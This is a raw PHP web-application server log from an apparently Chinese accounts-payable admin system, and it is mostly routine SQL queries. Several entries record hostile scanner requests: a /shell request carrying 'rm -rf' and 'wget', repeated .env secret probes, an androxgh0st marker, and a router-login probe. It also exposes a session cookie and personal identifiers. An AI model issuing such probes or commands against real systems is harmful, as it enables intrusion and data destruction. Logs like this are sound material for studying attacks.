SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.001137s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.003173s ] --------------------------------------------------------------- [ 2022-07-20T17:46:28+08:00 ] 106.112.205.110 POST /admin/financial/accountspayable/getTotal [ info ] 47.105.33.115:8081/admin/financial/accountspayable/getTotal [运行时间:0.063282s][吞吐率:15.80req/s] [内存消耗:5,439.13kb] [文件加载:87] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001221s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'getTotal', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '60', 'accept' => '*/*', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'suppliercustomername' => '陈红江', 'workername' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001620s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->getTotal[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.007593s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000420s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001659s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000551s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001549s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001059s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001104s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del,sum(accountspayable.money) as totalMoney FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) AND ( suppliercustomer.name = '陈红江' ) LIMIT 1 [ RunTime:0.001317s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del,sum(accountspayable.paid_money) as totalMoney FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) AND ( suppliercustomer.name = '陈红江' ) LIMIT 1 [ RunTime:0.001693s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001633s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"suppliercustomername\":\"\\u9648\\u7ea2\\u6c5f\",\"workername\":\"\"}' , '/admin/financial/accountspayable/getTotal' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658310388) [ RunTime:0.004633s ] --------------------------------------------------------------- [ 2022-07-20T17:46:28+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=0&limit=10&filter=%7B%22suppliercustomer.name%22%3A%22%E9%99%88%E7%BA%A2%E6%B1%9F%22%7D&op=%7B%22suppliercustomer.name%22%3A%22%3D%22%7D&_=1658310382833 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=0&limit=10&filter=%7B%22suppliercustomer.name%22%3A%22%E9%99%88%E7%BA%A2%E6%B1%9F%22%7D&op=%7B%22suppliercustomer.name%22%3A%22%3D%22%7D&_=1658310382833 [运行时间:0.105578s][吞吐率:9.47req/s] [内存消耗:5,688.73kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001094s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'choosecustom', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"suppliercustomer.name":"陈红江"}', 'op' => '{"suppliercustomer.name":"="}', '_' => '1658310382833', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001510s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->choosecustom[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000129s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000517s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001402s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000434s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001193s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001248s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001940s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000441s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001552s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001080s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001269s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE ( `suppliercustomer`.`name` = '陈红江' ) AND `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.001343s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE ( `suppliercustomer`.`name` = '陈红江' ) AND `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.001671s ] --------------------------------------------------------------- [ 2022-07-20T17:57:55+08:00 ] 61.84.247.241 GET /shell?cd+/tmp;rm+-rf+*;wget+ [ info ] 127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+ [运行时间:0.020718s][吞吐率:48.27req/s] [内存消耗:2,226.49kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001199s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'shell', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Hello, world', 'host' => '127.0.0.1:80', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'connection' => 'keep-alive', ) [ info ] [ PARAM ] array ( 'cd_/tmp;rm_-rf_*;wget_' => '', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T18:01:38+08:00 ] 193.56.29.206 GET /.env [ info ] 47.105.33.115/.env [运行时间:0.022259s][吞吐率:44.93req/s] [内存消耗:2,226.27kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001265s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '.env', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'accept-encoding' => 'gzip, deflate', 'accept' => '*/*', 'connection' => 'keep-alive', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T18:01:39+08:00 ] 193.56.29.206 POST / [ info ] 47.105.33.115/ [运行时间:0.068175s][吞吐率:14.67req/s] [内存消耗:4,788.22kb] [文件加载:77] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000065s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001720s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'accept-encoding' => 'gzip, deflate', 'accept' => '*/*', 'connection' => 'keep-alive', 'content-length' => '20', 'content-type' => 'application/x-www-form-urlencoded', ) [ info ] [ PARAM ] array ( '0x' => array ( 0 => 'androxgh0st', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.002173s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ DB ] INIT mysql [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.025125s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000751s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001680s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"0x\":[\"androxgh0st\"]}' , '/' , 0 , 'Unknown' , 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36' , '193.56.29.206' , 1658311299) [ RunTime:0.005847s ] --------------------------------------------------------------- [ 2022-07-20T18:01:40+08:00 ] 193.56.29.206 GET /.env [ info ] 47.105.33.115/.env [运行时间:0.021463s][吞吐率:46.59req/s] [内存消耗:2,228.78kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001136s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '.env', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'accept-encoding' => 'gzip, deflate', 'accept' => '*/*', 'connection' => 'keep-alive', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T18:01:41+08:00 ] 193.56.29.206 POST / [ info ] 47.105.33.115/ [运行时间:0.048978s][吞吐率:20.42req/s] [内存消耗:4,788.22kb] [文件加载:77] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001329s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'accept-encoding' => 'gzip, deflate', 'accept' => '*/*', 'connection' => 'keep-alive', 'content-length' => '20', 'content-type' => 'application/x-www-form-urlencoded', ) [ info ] [ PARAM ] array ( '0x' => array ( 0 => 'androxgh0st', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001627s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ DB ] INIT mysql [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.017574s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000461s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001447s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"0x\":[\"androxgh0st\"]}' , '/' , 0 , 'Unknown' , 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36' , '193.56.29.206' , 1658311301) [ RunTime:0.003527s ] --------------------------------------------------------------- [ 2022-07-20T18:20:29+08:00 ] 66.249.79.145 HEAD / [ info ] clcoa.com/ [运行时间:0.031152s][吞吐率:32.10req/s] [内存消耗:3,333.24kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001234s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'connection' => 'keep-alive', 'user-agent' => 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'accept-encoding' => 'gzip, deflate, br', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001639s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000139s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T18:24:33+08:00 ] 185.196.220.70 GET / [ info ] 47.105.33.115:80/ [运行时间:0.028977s][吞吐率:34.51req/s] [内存消耗:3,285.23kb] [文件加载:67] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001304s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', 'user-agent' => 'Linux Gnu (cow)', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'accept-language' => 'en-GB,en;q=0.5', 'accept-encoding' => 'gzip, deflate', 'connection' => 'close', 'upgrade-insecure-requests' => '1', ) [ info ] [ PARAM ] array ( ) [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001663s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000096s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T18:37:03+08:00 ] 51.141.123.219 POST /boaform/admin/formLogin [ info ] 47.105.33.115:80/boaform/admin/formLogin [运行时间:0.022331s][吞吐率:44.78req/s] [内存消耗:2,209.62kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001209s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'boaform', 1 => 'admin', 2 => 'formLogin', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', 'user-agent' => 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'accept-language' => 'en-GB,en;q=0.5', 'accept-encoding' => 'gzip, deflate', 'content-type' => 'application/x-www-form-urlencoded', 'content-length' => '29', 'origin' => 'http://47.105.33.115:80', 